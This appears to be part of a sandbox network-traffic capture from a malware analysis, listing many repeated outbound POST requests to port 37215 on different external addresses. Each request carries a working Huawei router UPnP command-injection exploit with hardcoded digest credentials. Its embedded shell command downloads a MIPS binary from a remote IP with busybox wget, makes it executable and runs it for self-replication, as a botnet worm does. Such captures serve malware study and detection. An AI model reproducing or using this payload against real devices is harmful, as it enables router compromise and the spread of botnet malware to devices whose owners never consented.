                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  450192.168.2.1343228197.243.205.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.114128113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  451192.168.2.1339128197.199.116.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.114136934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  452192.168.2.1356772197.254.224.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116002083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  453192.168.2.1355344157.98.123.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116019964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  454192.168.2.133455471.37.218.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116060972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  455192.168.2.135567241.11.137.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116070032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  456192.168.2.1350156197.104.140.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116086006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  457192.168.2.133654241.54.83.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116139889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  458192.168.2.1343046157.25.232.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116163969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  459192.168.2.1338278207.53.44.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116278887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 